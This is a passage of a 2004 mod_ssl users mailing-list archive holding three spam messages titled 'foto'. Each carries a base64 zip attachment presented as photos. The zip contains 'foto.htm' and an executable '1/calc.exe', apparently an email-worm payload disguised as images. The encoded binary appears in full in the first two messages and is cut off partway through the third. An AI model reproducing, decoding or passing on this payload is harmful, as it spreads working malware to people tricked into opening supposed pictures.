Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


foto







----------ziksqrfskkmodihdxuyq
Content-Type: application/octet-stream; name="foto.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="foto.zip"

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
UEsFBgAAAAADAAMAngAAABoRAAAAAA==

----------ziksqrfskkmodihdxuyq--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep  1 02:44:53 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 33550A8978; Wed,  1 Sep 2004 02:44:53 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from sim.org (61-220-184-202.HINET-IP.hinet.net [61.220.184.202])
	by master.modssl.org (Postfix) with SMTP id D2522A8943
	for ; Wed,  1 Sep 2004 02:44:47 +0200 (CEST)
Date: Wed, 01 Sep 2004 08:46:06 +0800
To: "Modssl-users" 
From: "Rse" 
Subject: foto
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------qadotmtysqjdhvrgomdj"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------qadotmtysqjdhvrgomdj
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


foto







----------qadotmtysqjdhvrgomdj
Content-Type: application/octet-stream; name="fotos.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="fotos.zip"

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
UEsFBgAAAAADAAMAngAAABoRAAAAAA==

----------qadotmtysqjdhvrgomdj--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep  1 02:52:27 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 75495A8943; Wed,  1 Sep 2004 02:52:27 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from sim.org (61-220-184-202.HINET-IP.hinet.net [61.220.184.202])
	by master.modssl.org (Postfix) with SMTP id 238C3A8934
	for ; Wed,  1 Sep 2004 02:52:25 +0200 (CEST)
Date: Wed, 01 Sep 2004 08:53:43 +0800
To: "Modssl-users" 
From: "Rse" 
Subject: foto
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------jzdhopwmmomhsclpqaxo"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------jzdhopwmmomhsclpqaxo
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


foto







----------jzdhopwmmomhsclpqaxo
Content-Type: application/octet-stream; name="fotos.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="fotos.zip"

UEsDBBQAAAAIAIKyITFhTJoyVgAAAG8AAAAIAAAAZm90by5odG2zySjJzbHj5bLxd/JydQ5R
8HP0dbVVj1BXcPZxDA72dLFVd/YBUlaGJqbmFiaGZrqGQIBGGBqaALGRMVCTv4urk2Mw0ARD
/eTEnGS91IpUdZDp+lBrAFBLAwQKAAAAAACKsiExAAAAAAAAAAAAAAAAAgAAADEvUEsDBBQA
AAAIAKa2ITGwdINuVhAAAAAyAAAKAAAAMS9jYWxjLmV4Ze1af3BUx33fEzKWjQJqAiWmaSwI
dokbnYV0R3FCG52lk2Ei4KyTEDay4d291b13evf2+f2QdGrcypZJQzU4mubndGj+SF1PJk2Z
tIUp8UyCMNQ2DZlCxtN67I6HkIz7YlzXY2isaVWun933Tpy4PZk0zXjcYeH7fbvf7+53v/vd
X9/vnrY/SEiEEFIHKJUI6SBBKn+P9PxwLamReJ1UkpCeyBLyfNemRJl+nqyILIvc1EjqUYgG
tAc+CNQEaA5bNgWd1odtyl+yL1Rm/tMU1J3/zn9E0iBvSy0Ff5kEudoi7KhLx1x8n1oSKsQH
UFcl4nzUVhVXIeRMXUAQ9ZYurNeB/9GgGrn0caBWwAbArVX1Zv43Q1ks9U+9sWsgPfVow5TX
OOD/Hkazf2bavWP6i3PtM5OnS28fnvg0cX9tIO2vBuvAUs5s+KuLF47xNbNn78Onn23gIiZP
zeYJ/tUBlnCzdZS8Bn8GYz6QnOvw6k8/2wj2weRsquQ1lbzGkjfnz4HLv0/iK8TxSkKWn9bO
7uog2qNA/p5SqbRsZsUT/0h49YY80T4JE/p/GsjeD87fCk6j/z1Bupyv1/iETJe8y3neQWkV
F3YgOdv+yrIZ9w857bJQYVYw/wVM0PuC3n4bMjQLuZR/J7IH+9/q5Q1mU3x4ov5LQtgbaLI2
Xyp5b/hRXi/pp3j+PMYx9ZDPs38X4Qtogoh2QVcvoikf8SFe6+TFNdpPeZf/gBKkNWpNv4Vx
vYzSxct75u06dzA5l9JiomWD/xoX+rMBtDqL3HRHShTyEViFtAbCT0cCsx6NcIvWcymPnXrx
Sqn0/P6XgDdEiJgo/+PIHNjPGQcFI1U6ygv+fYE6Gw/un+NUbR3XcVAQvYap/edBPH1yYZM1
XOcfhIXjmI32mdMntfp5XS+ApC2DfkHxFs4Q3Dd3Q3nif4dwnQRTkPzHeANUmPBnIVKr47k3
eU60ElZ7kldZzWWK4lFenCALuOROoHXzVfr/my8kd43/OiT9+fldIb0U51l/Elyochsanind
sa8ZjDt2C9wncJPAKwX+sMAfEbhZ4PUCbxD4EwIPCtwqcEzgzQJvEbhD4C6BtwrcI3BK4AaB
icD1wL/KdGgdId8GPLkuKMdw2qcADwNswOcBhwCHAacAFwCXAfWovwawDrAZ0AVIAQYBd4K/
BvAioDG8PY40X+1TQ50mlJ+qoH2f919Rfi90XEM6DebQrYqpGpSsJ53MKnbrBk3gQO60qeLS
oLQtLPUxZmjUsNrb0qZiORrDhTBBkmO6m7JZljoO+XdyH3U5oZOptE9DK5XcHAFtO1M9Q4jb
oRQgktxylRr0D9rtnMZFJVTV5uLIFk5JFx2XFrp0m2ZdZhcT5KlID1PUHj1jK7xIzkV2WtQs
